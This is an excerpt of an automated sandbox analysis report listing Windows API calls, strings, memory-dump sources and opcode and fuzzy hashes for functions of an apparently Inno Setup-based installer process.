                                          • Opcode Fuzzy Hash: 73dd2796517a7e24d17ffc93994b351d99c23e78418e73e458febebc51486027
                                          • Instruction Fuzzy Hash: 7C31C4717046049ED211BBB7EC1392D37A8DB89728B52487FF80496AA2DB3C58508B7E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,004524F3,?,?,00000000,0048D628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045244A
                                          • GetLastError.KERNEL32(00000000,00000000,?,00000000,004524F3,?,?,00000000,0048D628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00452453
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CreateDirectoryErrorLast
                                          • String ID: .tmp
                                          • API String ID: 1375471231-2986845003
                                          • Opcode ID: 3d8a0fc9d76ea684d9b8ffdb5fa20424f3177d473ad327c50664e8b149708a35
                                          • Instruction ID: 262ed652606ecd4b24f84628cd2d186957f5f2011fffa4f2ae7386c47ef5af69
                                          • Opcode Fuzzy Hash: 3d8a0fc9d76ea684d9b8ffdb5fa20424f3177d473ad327c50664e8b149708a35
                                          • Instruction Fuzzy Hash: A6216775A00308ABDB00EFA5C9829DFB7B9EF45305F50457BF801B7342DA7CAE059A68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0042DCB4: 6CAD6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004783BF,?,00000001,?,?,004783BF,?,00000001,00000000), ref: 0042DCD0
                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,00471FF2,00000000,00472008,?,?,?,?,00000000,?,0048A00F), ref: 00471DCE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CloseD6790
                                          • String ID: RegisteredOrganization$RegisteredOwner
                                          • API String ID: 3513276378-1113070880
                                          • Opcode ID: dc05276a867758ad81d07b72ee8a5d4e484fc6874cae0e0d7aca52102206a260
                                          • Instruction ID: 8fc1018621d838178f304ddf61fa62f48c71e0651657994db2425d214e1c5cfd
                                          • Opcode Fuzzy Hash: dc05276a867758ad81d07b72ee8a5d4e484fc6874cae0e0d7aca52102206a260
                                          • Instruction Fuzzy Hash: A8F0A735B0814867CB00E6A6DD53B9E33A9DB45304F50807BA1049B251D6B9FE00CB1C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • 6CAD5CA0.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,0046CE7D), ref: 0046CD19
                                          • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,0046CE7D), ref: 0046CD30
                                            • Part of subcall function 00451E44: GetLastError.KERNEL32(00000000,00451EDC,?,?,00000000,00000000,00000005,00000000,00452922,?,?,00000000,0048D628,00000004,00000000,00000000), ref: 00451E68
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CloseErrorHandleLast
                                          • String ID: CreateFile
                                          • API String ID: 918212764-823142352
                                          • Opcode ID: 3680ab04b98c7e682a5ea15e78cc49168d68a7200676f9f33bd99848e270dfb8
                                          • Instruction ID: 76e8e47a53df292ffdc7bea0b17f0be981d9ce437e069099ed8f64ea5dbc2dde
                                          • Opcode Fuzzy Hash: 3680ab04b98c7e682a5ea15e78cc49168d68a7200676f9f33bd99848e270dfb8
                                          • Instruction Fuzzy Hash: 9CE0ED70340304AFE610A769DCC6F6A7B989B04778F108165FA84AF3E2D5B9ED44865D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CreateWindow
                                          • String ID: D7B$TApplication
                                          • API String ID: 716092398-3833581397
                                          • Opcode ID: 85b28a6e909be971fa5c2b10f844aa2cfc1bbfc1f3ab945af7c68de878036d31
                                          • Instruction ID: 6f7591f20c68b61a58661acfffb9a3df5edb7f64d2e420099b873233bc7ca4e0
                                          • Opcode Fuzzy Hash: 85b28a6e909be971fa5c2b10f844aa2cfc1bbfc1f3ab945af7c68de878036d31
                                          • Instruction Fuzzy Hash: FEE002F2204309BFDB00DE8ADCC1DABB7ACFB4C654F844105BB1C972428275AC608B71
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • 6CAD68C0.ADVAPI32(?,NoModify,00000000,00000004,dJ,00000004,00000001,?,00467ED2,?,?,00000000,00467F5F,?,_is1,00000001), ref: 00467A53
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: NoModify$dJ
                                          • API String ID: 0-800172441
                                          • Opcode ID: 46b5fa948e778dcbe85151809d4e98f2a700c8705d486d4da5e9f2fb0ba61360
                                          • Instruction ID: 05bad810163c4ceb778b5726a376390f895694160466141ca5b05c7ce2be41b6
                                          • Opcode Fuzzy Hash: 46b5fa948e778dcbe85151809d4e98f2a700c8705d486d4da5e9f2fb0ba61360
                                          • Instruction Fuzzy Hash: DBE04FB4604304BFEB04DBA5CD4AF6B77ACDB48724F104059BA089B390E674FE40C668
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0045A86E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID: -$LzmaDecoderInit failed (%d)
                                          • API String ID: 4275171209-4285503710
                                          • Opcode ID: 2337044e03c035ba93b57a1ab65d48600398ba90547c165009fdbdc3351e9445
                                          • Instruction ID: ce92a4b14172b7b8f146cae1f667dbe7964f9d3ccef1d9495d5c0d533edb85f3
                                          • Opcode Fuzzy Hash: 2337044e03c035ba93b57a1ab65d48600398ba90547c165009fdbdc3351e9445
                                          • Instruction Fuzzy Hash: A6519170A042089FDB00DFA9C44579EBBB4EF08305F1442AAE904E7243D778DD5A8B5A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004244DA
                                          • TranslateMessage.USER32(?), ref: 00424557
                                          • DispatchMessageA.USER32 ref: 00424561
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Message$DispatchPeekTranslate
                                          • String ID:
                                          • API String ID: 4217535847-0
                                          • Opcode ID: a3864dcb05f7fa3a1ae4aaac3fcf3cfd287155588397a3feda0b4a1d612d8563
                                          • Instruction ID: 50ce2c9e70e4eaae550d78c07e9c46089a6dadb1d18dfb0cfc0e9111bdecdfbf
                                          • Opcode Fuzzy Hash: a3864dcb05f7fa3a1ae4aaac3fcf3cfd287155588397a3feda0b4a1d612d8563
                                          • Instruction Fuzzy Hash: 501154303043206BDA21E664A94179B73D4DFC5B48F80481EFAC997382D7BDDD859B9A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetPropA.USER32 ref: 00416732
                                          • SetPropA.USER32 ref: 00416747
                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 0041676E
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Prop$Window
                                          • String ID:
                                          • API String ID: 3363284559-0
                                          • Opcode ID: dcfb28db4e21e1347727ab6fef254df2d5c6776ae7acbe9f9cc92ac1cf30ba34
                                          • Instruction ID: 51db7ca5a9fce4f0319e037eda000c89f68284c9b22635f91d1590f0371f096d
                                          • Opcode Fuzzy Hash: dcfb28db4e21e1347727ab6fef254df2d5c6776ae7acbe9f9cc92ac1cf30ba34
                                          • Instruction Fuzzy Hash: 9AF0B271702210ABD710AF599C85FA632DCAB09719F1505BABD08EF2D6C679DC4487A8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetActiveWindow.USER32(?), ref: 004772DA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: ActiveWindow
                                          • String ID: InitializeWizard
                                          • API String ID: 2558294473-2356795471
                                          • Opcode ID: 8f5aa8ab210abca25a3b561bd254279c72b8fe58534d7761e8805a32d80afa36
                                          • Instruction ID: b02ce51899e4cb3563328e529591e4cf6ff4720998866f6c619a7b5757ff9684
                                          • Opcode Fuzzy Hash: 8f5aa8ab210abca25a3b561bd254279c72b8fe58534d7761e8805a32d80afa36
                                          • Instruction Fuzzy Hash: 0811C23160C2449FD711EBA9EC52B9A3B98E74A324F6044BBF41983AA1E6396800C75D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0042DCB4: 6CAD6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004783BF,?,00000001,?,?,004783BF,?,00000001,00000000), ref: 0042DCD0
                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,00471ECE,00000000,00472008), ref: 00471CDD
                                          Strings
                                          • Software\Microsoft\Windows\CurrentVersion, xrefs: 00471CAD
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CloseD6790
                                          • String ID: Software\Microsoft\Windows\CurrentVersion
                                          • API String ID: 3513276378-1019749484
                                          • Opcode ID: 58e33d0b3820e3d3276818e37a665b85ca4aef660687782bc27ab43273ace938
                                          • Instruction ID: 49f62564b5c020d95f3bf380884e2fac3a6e22930ca8c995e06027c69e75b900
                                          • Opcode Fuzzy Hash: 58e33d0b3820e3d3276818e37a665b85ca4aef660687782bc27ab43273ace938
                                          • Instruction Fuzzy Hash: 70F027327441247BDA04A1EF6C42BEEA29CDF84718F20403BF509DB362D9BADE01936C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • 6CAD68C0.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,00000001,004AE064,?,00467B63,?,00000000,00467F5F,?,_is1), ref: 004679F3
                                          Strings
                                          • Inno Setup: Setup Version, xrefs: 004679F1
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Inno Setup: Setup Version
                                          • API String ID: 0-4166306022
                                          • Opcode ID: 74786683835a296d1d2ef93f169cd4d7b2021a1ac276dbafc591dab8d48098fa
                                          • Instruction ID: 7b6352c98c09a79ccde8b08551028820b2906c7e57d218ecf09e1c460de49617
                                          • Opcode Fuzzy Hash: 74786683835a296d1d2ef93f169cd4d7b2021a1ac276dbafc591dab8d48098fa
                                          • Instruction Fuzzy Hash: F3E065713012047BD710AA6A9C89F5BB6DCDF887A4F00447AB90CDB352D575DD408568
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • 6CAD6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004783BF,?,00000001,?,?,004783BF,?,00000001,00000000), ref: 0042DCD0
                                          Strings
                                          • System\CurrentControlSet\Control\Windows, xrefs: 0042DCCE
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: D6790
                                          • String ID: System\CurrentControlSet\Control\Windows
                                          • API String ID: 3077103850-1109719901
                                          • Opcode ID: aa21068e09dffa96e85b39163423caf07922cc031927357f26d27300ba816339
                                          • Instruction ID: 252469d4665b97d1cf586433f62e7af82fe31e26ad1ddc23bb3c89940e80562f
                                          • Opcode Fuzzy Hash: aa21068e09dffa96e85b39163423caf07922cc031927357f26d27300ba816339
                                          • Instruction Fuzzy Hash: 39D0C7729101287BDB109A89DC41DF7775DDB59360F444016FD0497200C1B4ED5187F4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlEnterCriticalSection.KERNEL32(0048D420,00000000,00402204), ref: 004020D3
                                            • Part of subcall function 004019D4: RtlInitializeCriticalSection.KERNEL32(0048D420,00000000,00401A8A,?,?,00402236,0048D460,00000000,00000000,?,?,00401C51,00401C66,00401DAA), ref: 004019EA
                                            • Part of subcall function 004019D4: RtlEnterCriticalSection.KERNEL32(0048D420,0048D420,00000000,00401A8A,?,?,00402236,0048D460,00000000,00000000,?,?,00401C51,00401C66,00401DAA), ref: 004019FD
                                            • Part of subcall function 004019D4: LocalAlloc.KERNEL32(00000000,00000FF8,0048D420,00000000,00401A8A,?,?,00402236,0048D460,00000000,00000000,?,?,00401C51,00401C66,00401DAA), ref: 00401A27
                                            • Part of subcall function 004019D4: RtlLeaveCriticalSection.KERNEL32(0048D420,00401A91,00000000,00401A8A,?,?,00402236,0048D460,00000000,00000000,?,?,00401C51,00401C66,00401DAA), ref: 00401A84
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                          • String ID:
                                          • API String ID: 296031713-0
                                          • Opcode ID: 853685f3dbed9f38c53037365cb2640759140303a7593ac019a6f2320df6d27e
                                          • Instruction ID: efce3ed5edfca4bdd6d7588905b72773811f0370f718a470ac866a0653614aae
                                          • Opcode Fuzzy Hash: 853685f3dbed9f38c53037365cb2640759140303a7593ac019a6f2320df6d27e
                                          • Instruction Fuzzy Hash: CC41CFB2E023049FE720CF69DD8561DBBA0FB54728B15467ED844A77E2D378AC42CB48
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegQueryValueExA.ADVAPI32(?,0042E470,00000000,00000000,00000000,?,00000000,0042DBD1,?,?,00000000,00000000), ref: 0042DAE8
                                          • RegQueryValueExA.ADVAPI32(?,0042E470,00000000,00000000,00000000,00000000,?,0042E470,00000000,00000000,00000000,?,00000000,0042DBD1), ref: 0042DB40
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: QueryValue
                                          • String ID:
                                          • API String ID: 3660427363-0
                                          • Opcode ID: 8e3b2a71cf41163fc7a0db4ba73d3df46e8db2e3b4fe39bd15de565b3d8b0fe0
                                          • Instruction ID: 0e7576e286cf79993513e01da67dc7455a51607c0b1d4e8bc5d861b2dca46959
                                          • Opcode Fuzzy Hash: 8e3b2a71cf41163fc7a0db4ba73d3df46e8db2e3b4fe39bd15de565b3d8b0fe0
                                          • Instruction Fuzzy Hash: 22410D70E00118BFDB21DF95D891BEFBBB8EF05314F9585A6E810A7290D738BA44CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0042DCB4: 6CAD6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004783BF,?,00000001,?,?,004783BF,?,00000001,00000000), ref: 0042DCD0
                                          • RegEnumKeyExA.ADVAPI32 ref: 0042DDEC
                                          • RegCloseKey.ADVAPI32(?,0042DE5D,?,00000000,00000000,00000000,00000000,00000000,0042DE56,?,?,00000008,00000000,00000000,0042DE83), ref: 0042DE50
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CloseD6790Enum
                                          • String ID:
                                          • API String ID: 3529925450-0
                                          • Opcode ID: 8afd54fa5afda933115ccd3b0db7f41e9d14088c8f5b5d7f941e79e5460edd25
                                          • Instruction ID: 5e4b05f4a3e0476540ac301d5f1dac6772fd0ae46009fb461a6a6db6e0667857
                                          • Opcode Fuzzy Hash: 8afd54fa5afda933115ccd3b0db7f41e9d14088c8f5b5d7f941e79e5460edd25
                                          • Instruction Fuzzy Hash: E2319370F04618AEDB10EFA1DC52BBFB7B9EB48744F91447AE500F7281D6389A01CA29
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • 6CAD6060.KERNEL32(00000000,00000000,00000000,00451804), ref: 004517DE
                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00451804), ref: 004517E6
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: D6060ErrorLast
                                          • String ID:
                                          • API String ID: 581812409-0
                                          • Opcode ID: 2e3c7a9707636af3bcdad6923f18bb4592bde806625197659ce5a4d4f60f9180
                                          • Instruction ID: 1f8f1ae2a19b5dd98b784e482048326263c3535bd956013154575bb21478434f
                                          • Opcode Fuzzy Hash: 2e3c7a9707636af3bcdad6923f18bb4592bde806625197659ce5a4d4f60f9180
                                          • Instruction Fuzzy Hash: 7F01F972B04608ABCB10EF7A9C4159EB7ECDB4975675046BBFC04E3752EB385E0485AC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00451383), ref: 0045135D
                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00451383), ref: 00451365
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CreateDirectoryErrorLast
                                          • String ID:
                                          • API String ID: 1375471231-0
                                          • Opcode ID: 833f21c5392796a44ebcff5dc203d3b36506b61773b1d3d31a3e99eac73e82e2
                                          • Instruction ID: 27d3de9a8ed551c2def9e0a30266f883e75579bda74dad919e0820e1c2d818b9
                                          • Opcode Fuzzy Hash: 833f21c5392796a44ebcff5dc203d3b36506b61773b1d3d31a3e99eac73e82e2
